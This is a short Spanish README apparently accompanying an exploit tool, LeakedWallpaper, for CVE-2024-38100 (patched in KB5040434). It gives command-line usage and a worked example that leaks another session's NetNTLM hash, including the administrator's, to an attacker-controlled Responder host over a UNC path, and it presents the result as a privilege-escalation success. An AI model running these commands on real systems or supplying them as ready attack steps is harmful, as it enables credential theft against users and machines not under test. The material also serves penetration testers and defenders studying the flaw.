
Fuga del hash NetNTLM de cualquier usuario. Corregido en KB5040434.
Esta es una herramienta de escalada de privilegios (corregida con CVE-2024-38100 en KB5040434) que permite filtrar el hash NetNTLM de un usuario desde cualquier sesión del equipo, incluso si estamos trabajando desde un usuario con bajos privilegios.
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
Si está bloqueado, consulta demo.mkv
Imaginemos que tenemos dos sesiones en el equipo:
ID de sesión actual: 2
ID de sesión objetivo: 1

IP de Responder: 172.16.0.5
IP de Windows: 172.16.0.2

¡Obtengamos el hash NetNTLM del administrador con la herramienta!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
¡Éxito!
